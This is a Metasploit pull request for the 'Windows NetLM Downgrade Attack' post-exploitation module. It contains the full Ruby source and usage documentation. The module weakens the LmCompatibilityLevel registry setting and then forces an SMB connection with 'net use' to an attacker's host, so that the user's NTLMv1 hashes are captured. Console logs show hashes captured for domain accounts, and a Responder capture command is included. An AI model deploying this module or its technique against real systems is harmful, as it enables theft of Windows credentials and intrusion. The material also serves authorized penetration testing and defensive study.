### PR TITLE
netlm_downgrade: Cleanup and support non-Meterpreter sessions

### DIFF
--- a/documentation/modules/post/windows/gather/netlm_downgrade.md
+++ b/documentation/modules/post/windows/gather/netlm_downgrade.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+
+This module changes the system `LmCompatibilityLevel` registry value
+to enable sending LM challenge hashes and initiates a SMB connection
+to the host specified in the SMBHOST module option. If an SMB server
+is listening, it will receive the NetLM hashes for the session user.
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/netlm_downgrade`
+4. Do: `set SESSION <session id>`
+5. Start a SMB server to capture hashes
+6. Do: `set SMBHOST <SMB server IP address>`
+7. Do: `run`
+
+## Options
+
+
+### SMBHOST
+
+IP address of SMB server to capture hashes.
+
+
+## Scenarios
+
+### Windows 11 Pro 10.0.22000 Build 22000 x64
+
+```
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 2.
+
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+msf6 auxiliary(server/capture/smb) > use post/windows/gather/netlm_downgrade 
+msf6 post(windows/gather/netlm_downgrade) > set session 1
+session => 1
+msf6 post(windows/gather/netlm_downgrade) > run
+
+[*] Running module against WINDEV2110EVAL (192.168.200.140)
+[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
+[+] NetLM authentication is enabled
+[*] Establishing SMB connection to 192.168.200.130
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client     : 192.168.200.140
+[SMB] NTLMv1-SSP Username   : WINDEV2110EVAL\User
+[SMB] NTLMv1-SSP Hash       : User::WINDEV2110EVAL:414a0d26193abde800000000000000000000000000000000:44d90728eeb025c1dcf4730a0282422614cbc8e590e99a11:b0e33cde858f04d5
+
+[+] SMB server 192.168.200.130 should now have NetLM hashes
+[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
+[*] Post module execution completed
+msf6 post(windows/gather/netlm_downgrade) > 
+```
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 2.
+
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+msf6 auxiliary(server/capture/smb) > use post/windows/gather/netlm_downgrade 
+msf6 post(windows/gather/netlm_downgrade) > set smbhost 192.168.200.130
+smbhost => 192.168.200.130
+msf6 post(windows/gather/netlm_downgrade) > set session 1
+session => 1
+msf6 post(windows/gather/netlm_downgrade) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] NetLM authentication is disabled (LmCompatibilityLevel: 3). Enabling ...
+[+] NetLM authentication is enabled (LmCompatibilityLevel: 0)
+[*] Establishing SMB connection to 192.168.200.130
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client     : 192.168.200.218
+[SMB] NTLMv1-SSP Username   : CORP\corpadmin
+[SMB] NTLMv1-SSP Hash       : corpadmin::CORP:de7f490cc7f7f8a700000000000000000000000000000000:8a34755c17fdbd4f1d7338b5ed7617e2000f071f05869f2e:c30fd80a6709381b
+
+[+] SMB server 192.168.200.130 should now have NetLM hashes
+[*] Restoring original LM compatibility level (LmCompatibilityLevel: 3)
+[*] Post module execution completed
+msf6 post(windows/gather/netlm_downgrade) > 
+```
+
+Alternatively, the SMB connection can captured using [Responder](https://github.com/lgandx/Responder):
+
+```
+$ sudo responder -A -I eth0 --lm -v
+
+[...]
+
+[SMB] NTLMv1 Client   : 192.168.200.218
+[SMB] NTLMv1 Username : CORP\corpadmin
+[SMB] NTLMv1 Hash     : corpadmin::CORP:3FFCF0AED51EF9784B17BF71859355CA0FF968A42BF925D4:3FFCF0AED51EF9784B17BF71859355CA0FF968A42BF925D4:07168acbca2d7e8e
+```
+

--- a/modules/post/windows/gather/netlm_downgrade.rb
+++ b/modules/post/windows/gather/netlm_downgrade.rb
@@ -5,98 +5,99 @@
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
-  include Msf::Post::Windows::WindowsServices
   include Msf::Post::Windows::Priv
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Windows NetLM Downgrade Attack',
-      'Description'    => %q{ This module will change a registry value to enable
-        the sending of LM challenge hashes and then initiate a SMB connection to
-        the SMBHOST datastore. If an SMB server is listening, it will receive the
-        NetLM hashes
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows NetLM Downgrade Attack',
+        'Description' => %q{
+          This module changes the system LmCompatibilityLevel registry value
+          to enable sending LM challenge hashes and initiates a SMB connection
+          to the host specified in the SMBHOST module option. If an SMB server
+          is listening, it will receive the NetLM hashes for the session user.
         },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'Author' => [
           'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
           'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
         ],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'References'     =>
-        [
-          [ 'URL', 'https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks']
-        ]
-    ))
+        'SessionTypes' => ['meterpreter', 'shell', 'powershell'],
+        'References' => [
+          ['URL', 'https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks'],
+          ['URL', 'https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level'],
+          ['URL', 'https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [CONFIG_CHANGES]
+        }
+      )
+    )
 
-    register_options(
-      [
-        OptAddress.new('SMBHOST', [ true, 'IP Address where SMB host is listening to capture hashes.' ])
-      ])
+    register_options([
+      OptAddress.new('SMBHOST', [ true, 'IP address of SMB server to capture hashes.' ])
+    ])
   end
 
-  # method to make smb connection
-  def smb_connect
-    begin
-      print_status("Establishing SMB connection to " + datastore['SMBHOST'])
-      cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}")
-      print_good("The SMBHOST should now have NetLM hashes")
-    rescue
-      print_error("Issues establishing SMB connection")
-    end
+  def smb_connect(smb_host)
+    print_status("Establishing SMB connection to #{smb_host}")
+    cmd_exec('cmd.exe', "/c net use \\\\#{smb_host}")
+    print_good("SMB server #{smb_host} should now have NetLM hashes")
   end
 
-  # if netlm is disabled, enable it in the registry
+  def lm_compatibility_level
+    registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa', 'LmCompatibilityLevel')
+  end
+
+  def set_lm_compatibility_level(level)
+    subkey = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
+    v_name = 'LmCompatibilityLevel'
+
+    v = level.nil? ? registry_deleteval(subkey, v_name) : registry_setvaldata(subkey, v_name, level, 'REG_DWORD')
+
+    fail_with(Failure::Unknown, "Error modifying registry value #{subkey}\\#{v_name}") if v.nil?
+
+    v
+  end
+
   def run
-    # if running as SYSTEM exit
-    if is_system?
-      # running as SYSTEM and will not pass any network credentials
-      print_error "Running as SYSTEM, should be run as valid USER"
-      return
-    end
+    @needs_cleanup = false
 
-    subkey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\"
-    v_name = "lmcompatibilitylevel"
-    netlm = registry_getvaldata(subkey, v_name)
-    if netlm.nil?
-      print_error("Issues enumerating registry values")
-      return
-    end
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Running module against #{hostname} (#{session.session_host})")
 
-    if netlm == 0
-      print_status("NetLM is already enabled on this system")
+    # Running as SYSTEM and will not pass any network credentials
+    fail_with(Failure::BadConfig, 'Running as SYSTEM. This module should be run as a user.') if is_system?
 
-      # call smb_connect method to pass network hashes
-      smb_connect
+    @original_lm_compat = lm_compatibility_level
+
+    if @original_lm_compat == 0
+      print_good("NetLM authentication is already required on this system (LmCompatibilityLevel: #{@original_lm_compat})")
     else
-
-      print_status("NetLM is Disabled: #{subkey}#{v_name} == #{netlm.to_s}")
-      v = registry_setvaldata(subkey,v_name,0,"REG_DWORD")
-      if v.nil?
-        print_error("Issues modifying registry value")
-        return
-      end
-
-      post_netlm = registry_getvaldata(subkey, v_name)
-      if post_netlm.nil?
-        print_error("Issues enumerating registry values")
-        return
-      end
-
-      print_good("NetLM is Enabled:  #{subkey}#{v_name} == #{post_netlm.to_s}")
-
-        # call smb_connect method to pass network hashes
-      smb_connect
-
-      # cleanup the registry
-      v = registry_setvaldata(subkey,v_name,netlm,"REG_DWORD")
-      if v
-        print_status("Cleanup Completed: #{subkey}#{v_name} == #{netlm.to_s}")
-      else
-        print_error("Issues cleaning up registry changes")
-        return
-      end
-
+      print_status("NetLM authentication is disabled (LmCompatibilityLevel: #{@original_lm_compat.inspect}). Enabling ...")
+      set_lm_compatibility_level(0)
+      fail_with(Failure::Unknown, 'Could not enable NetLM authentication') unless lm_compatibility_level == 0
+      @needs_cleanup = true
+      print_good('NetLM authentication is enabled')
     end
+
+    # call smb_connect method to pass network hashes
+    smb_connect(datastore['SMBHOST'])
+  end
+
+  def cleanup
+    return unless @needs_cleanup
+
+    print_status("Restoring original LM compatibility level (LmCompatibilityLevel: #{@original_lm_compat.inspect})")
+
+    unless set_lm_compatibility_level(@original_lm_compat)
+      print_error('Could not restore original LM compatibility level')
+    end
+  ensure
+    super
   end
 end


### PR DESCRIPTION
Resolves Rubocop violations.

Adds documentation.

Adds `Notes` module meta information.

Fixes multiple bugs:

* `platform` was not defined, causing an error: `[!] SESSION may not be compatible with this module`. Clearly a lie.
* If the `LmCompatibilityLevel` registry value did not exist (default on modern Windows systems) the module would fail with an error: `[-] Issues enumerating registry values`. This is not a failure condition. Creating the key creates the desired behaviour.
* The module used the `Windows::WindowsServices` mixin which has been deprecated and also isn't required. Removed.

Adds support for `shell` and `powershell` sessions. Sadly, the module dies half way through (immediately after the `cmd_exec` call) on PowerShell sessions. Not only does this break the remainder of module execution, it also breaks the sessions. I'm fairly certain this is a bug with handling of `cmd_exec` for PowerShell sessions.

---

# Before

```
msf6 post(windows/gather/netlm_downgrade) > rexploit
[*] Reloading module...

[-] The Windows::WindowsServices mixin is deprecated, use Windows::Services instead
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[-] Issues enumerating registry values
[*] Post module execution completed
```

# After

```
msf6 post(windows/gather/netlm_downgrade) > rexploit 
[*] Reloading module...

[*] Running module against WIN-7V3NGVNQTJ1 (192.168.200.215)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 192.168.200.130
[+] SMB server 192.168.200.130 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[*] Post module execution completed
```

---

